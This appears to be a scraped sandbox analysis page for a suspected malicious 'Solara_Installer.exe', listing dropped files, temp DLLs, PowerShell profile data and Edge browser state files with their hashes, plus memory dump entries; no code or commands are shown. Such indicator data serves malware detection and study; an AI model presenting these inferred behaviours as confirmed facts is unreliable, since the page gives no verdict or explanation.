Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c1c5e689c7278b34edc71a9cc10086e9

SHA1
6d35a38b49637a701d88bf7c81d9540928d2b8d5

SHA256
40a4058dfcf93a44ba67a5a27219ddcf24eb60c50dfc1b43bf82f20a39877b44

SHA512
195d92213dda7e0ec385a867d1ff61a8a32e350127900b614875e5a2ef5ca7a3a0b6d5a588c12d7300115ae0a2ef66937a8a7543485fac570ef3e9849d78e156

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
b899c7ccc3155e6af95a1ca54f549827

SHA1
7da370d9f93a0e1e8ba3bf76a5c5375613a856f6

SHA256
5a91fe5e6314c65460c79d0f6bf6459f0ad95c85fb93df61de697190a2d2c8ba

SHA512
f30977f269ff2354d7f7fcce2e7efd448ff7ad86d1bc7ffcdf27fa78e9e1ee7a48cdf8b5ce7da7e1e6726c28c94f3e50ed2320f8e6e2bc6267a809c3eaf377e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2f8432dcd51d60f9171395e3d1fc86e2

SHA1
f664e014beaeb04f85b1df8c0c958e02d0059a4b

SHA256
61731fe32fe68a6c96c0adf5e6c338e922b2320f77cac559cf5f6e9932afdd92

SHA512
29cbfb5eae68aeeb5468ffe27b6fc23763007d8caffac5e4811c00e1f15e33686085e0d28f2e85b3215b77033a8fd7b8c691591ab02b3d3531683c76f5df12fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\4a0j20jz\4a0j20jz.dll

Filesize
3KB

MD5
f40042db24ecb6e6c6ffcebb102bff9c

SHA1
d21c82d892e1fb46882c6abf232ba150c01e8006

SHA256
e7308e8b4c1b9b6513e54e5d05ed2f7018c37ddd89cbedd6dce5daa845d21a47

SHA512
48bd640b54cc75641a0ea0a018287416b7d003e02b2f20634b12e799b6b1a696b8a3ab8f69f126520c1b2d148db6be9320bb0bd82f64faf535f9424bf80bde95

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3857.tmp

Filesize
1KB

MD5
24d9b9515cb53e146d01f7366fbdd89a

SHA1
72150f786d1660db6d349318e7162a584f9b0d92

SHA256
60a62bd231c22d458cf5a87fb1a084ef91b4122e0a42e40c1d5606e63535af5a

SHA512
285f3678eb175dd2868515a862c34e114e797aa340de6b607f3b21d2741b8d3324f22e9375efe89afaecf9d98f4fa8dee3ffe9e7a9d172d48c68a3292dc32338

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4D27.tmp

Filesize
1KB

MD5
16c636b5b76025d19dbb6607e6c196a3

SHA1
9d9e74cf65946ed19b1b6e4187400cc44ecd4947

SHA256
8c41f0405d9c839c61cd28001557c39196fdcd6fa9e6adfb51a2c362cd7bb2c8

SHA512
67bf51a682e0998baf0a4b1c010758f9060de82ac7f2106ee09beb97b94392a79ef77bffdc1ab3126279a1a308cb8a34ef6f8ba531117eae449eeab308b661cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0hjgrzk.sbx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vro01lub\vro01lub.dll

Filesize
3KB

MD5
cf53bc0d0314b65050e87332b96e8b63

SHA1
f04ae5d51d0c19c2161d75eb0ec3606e6cfea185

SHA256
83fd99f4dc44b7b93fc849885517076d507a8a2f23122ccb9db1ce31c5d42906

SHA512
3991c118624e7ee38b27b6ee06b46e96a06febdc7b40c7cd31b444315fdd366eb59eabbc165480ce96b43339d76d976d260d240353c60d3eed27d5dc8f5713e7

Download Submit
C:\Users\Admin\Downloads\SolaraInstaller.zip

Filesize
11.6MB

MD5
6b13d000c770e51ba3f3b194e9bb3320

SHA1
fce64cff48849e81689059d6f94656f04ac69fdf

SHA256
a3287e549257ebc0340ac27a539ab8a1a1a4d9a5d954e13cb6e61b6aadb44f31

SHA512
59b437f639a217cced0d321e41605c269402a3ace495a773efb7eb24f762c7668ccbd05ccfd15006df4f7f03d7bbf4d88e936ac1a90462b18f0a7c9909a9953f

Download Submit
C:\Users\Admin\Downloads\SolaraInstaller.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\SolaraInstaller\Solara_Installer.exe

Filesize
30.1MB

MD5
597722b7cf9d73b191e4351107b5760a

SHA1
c508bbc2df024f94dc687bf0ca64f6efa7879974

SHA256
9505d9c4f828befb7fb6833d38a28b69492408dbdd4bd25412cbefe627357af8

SHA512
00a734caae645c529761f7cb91b0c6e84bffbb9c02e4e790dbff8cb910cd7e37278dff2c456b9a26ac76f66a33c6378b18249e2dca1c427fd6731df3c0037b4a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4a0j20jz\4a0j20jz.0.cs

Filesize
353B

MD5
379570600f5439dda873eda8f0ce4a79

SHA1
2023b772101aff5b12ab53f24a69742a4b9c394f

SHA256
2c058658252d0f5a4613dc846d56329797e86033e3c61b9b68537ae167000072

SHA512
70ad464f11597e9677a757c59a79a27650487d0f59cbb35d88e9775236e2dbf3cb78413b10eac3e9a33e2cba7fb1fb85ef7755b1d25e1c7d9513615ea4daf152

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4a0j20jz\4a0j20jz.cmdline

Filesize
369B

MD5
0a10e5ed80ebf399e5e000bae16ee568

SHA1
3af54c4e339bcaa9f7b87fc76b18482fa6114a86

SHA256
cf630b6785a3a6e0c5ac3d5de5f2cda7743c78925b7f5b4041c45f3b54f794c2

SHA512
934d652092c961e4b60c4d35505ecb5936eaf54b8e809cf13c9cfc9cd63eedab6b77633aa7c8f4266b90096cc9529641b9de4eaafc25995d4831fbd9b58b9901

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4a0j20jz\CSC28BBCBA98CC54F96B234CFEC0EB4CF8.TMP

Filesize
652B

MD5
555b0d244933ad841442c191402c5402

SHA1
219b4c0c37042463907483dce74711ea6b4c3700

SHA256
4d53587472b507822c7a314f72707b5d3958e805a6b90e567b2f8c67e29c74b7

SHA512
86f6af8ccef49b1f1623dd7595830c0dbd90284187d2a9ff4099d6008d2db33e5e2a2e773226754f1ceeae8298be0d6150995dfaeda5a56b77d47387f23b12fb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vro01lub\CSC6498EFC9A157426DB2E6A486B9F324AD.TMP

Filesize
652B

MD5
0a8b092fee8edc2c6be785c98713bc12

SHA1
ae572ff85963fc1d98e5ff61b51ec6458f813e34

SHA256
072894b98ffe553fb1927c524d0a956c5784895efc337715d2d3c46b3fa27487

SHA512
30d53b777537c09897a055a1a8d44aa92d0b32b116aa6976ed011d8834ec6ce9f16cd1675733e31766b51211f40ff5410597b92874d2d8b6913772b2c6f8c3e3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vro01lub\vro01lub.cmdline

Filesize
369B

MD5
9ea77c85cdf032e7f49d9710e84f6eb6

SHA1
753aff464ef69d572ca326ca81cf0d6b813775cf

SHA256
bedcaf61f703e58806a49a0f6ec22652b7b3d0f2bc0d76d6ce96b3761c532f2b

SHA512
9fed35865441f388eb874b721a0fefab8adbc7829cee62fa157dd24b241749b580e72dba1b19dc4fd0be59c4f411e0cd50a3bda383654058590cab6dbcc79602

Download Submit
memory/4448-1823-0x000002A94DB90000-0x000002A94DB98000-memory.dmp

Filesize
32KB

Download
memory/4448-1807-0x000002A94DAD0000-0x000002A94DAF2000-memory.dmp

Filesize
136KB

Download
memory/4448-1808-0x000002A94E140000-0x000002A94E302000-memory.dmp

Filesize
1.8MB

Download
memory/4448-1809-0x000002A94E840000-0x000002A94ED68000-memory.dmp

Filesize
5.2MB

Download
memory/5360-1821-0x0000028D90FE0000-0x0000028D91AA2000-memory.dmp

Filesize
10.8MB

Download
memory/5736-1863-0x000001E339310000-0x000001E339318000-memory.dmp

Filesize
32KB

Download
memory/6080-1861-0x00000250E49E0000-0x00000250E54A2000-memory.dmp

Filesize
10.8MB

Download